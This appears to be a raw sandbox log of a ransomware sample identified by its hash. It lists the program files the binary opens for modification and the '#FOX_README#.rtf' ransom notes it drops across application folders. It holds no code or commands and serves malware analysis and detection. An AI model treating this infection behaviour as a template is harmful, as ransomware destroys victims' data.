f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Chrome\Application\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Porto_Velho f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\launcher.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.properties.src f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\omni.ja f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\default.jfc f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Kentucky\Monticello f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EST f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\pack200.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\winamp2.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer.bat f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Syowa f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.http_8.1.14.v20131031.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.CMP f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Goose_Bay f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Port_of_Spain f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jmx.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\pt-PT.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\ImportUnregister.ADTS f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-ui.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmid.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\bin\keytool.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaSansRegular.ttf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Luxembourg f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dhaka f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\MST7 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\rockbox_fm_presets.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7TSFrame.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.zh_CN_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\de.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ho_Chi_Minh f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Costa_Rica f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Tirane f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-ui.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\bin\kinit.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Antigua f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Abidjan f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Maputo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro_3.4.200.v20130326-1254.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Vienna f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\Indian\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Pangnirtung f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup-impl.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh88 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\mobile.css f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\PST8PDT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\La_Rioja f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\jhall-2.0_05.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-uihandler.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_xml.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Khandyga f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-windows.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk_1.0.300.v20140407-1803.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Sofia f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.zh_CN_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Gambier f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Warsaw f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tashkent f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_MoveNoDrop32x32.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Maputo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvm.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Mazatlan f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_fr.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Curacao f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\America\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\ProtectLock.css f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.SYD f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator_2.0.0.v20131217-1203.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Winnipeg f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-cli.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Dublin f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jcmd.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\precomplete f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\vi.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\bn.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Perth f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.zh_CN_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Marquesas f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tahiti f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogoCanary.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Phoenix f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.RSA f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\BackupPush.temp f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Madeira f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Tell_City f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\South_Georgia f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\ResourceInternal.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt_0.12.100.v20140530-1436.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Srednekolymsk f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightItalic.ttf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dummy.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\eclipse.inf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novosibirsk f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-13 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\tesselate.x3d f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Data1.cab f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sl.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\vlc.mo 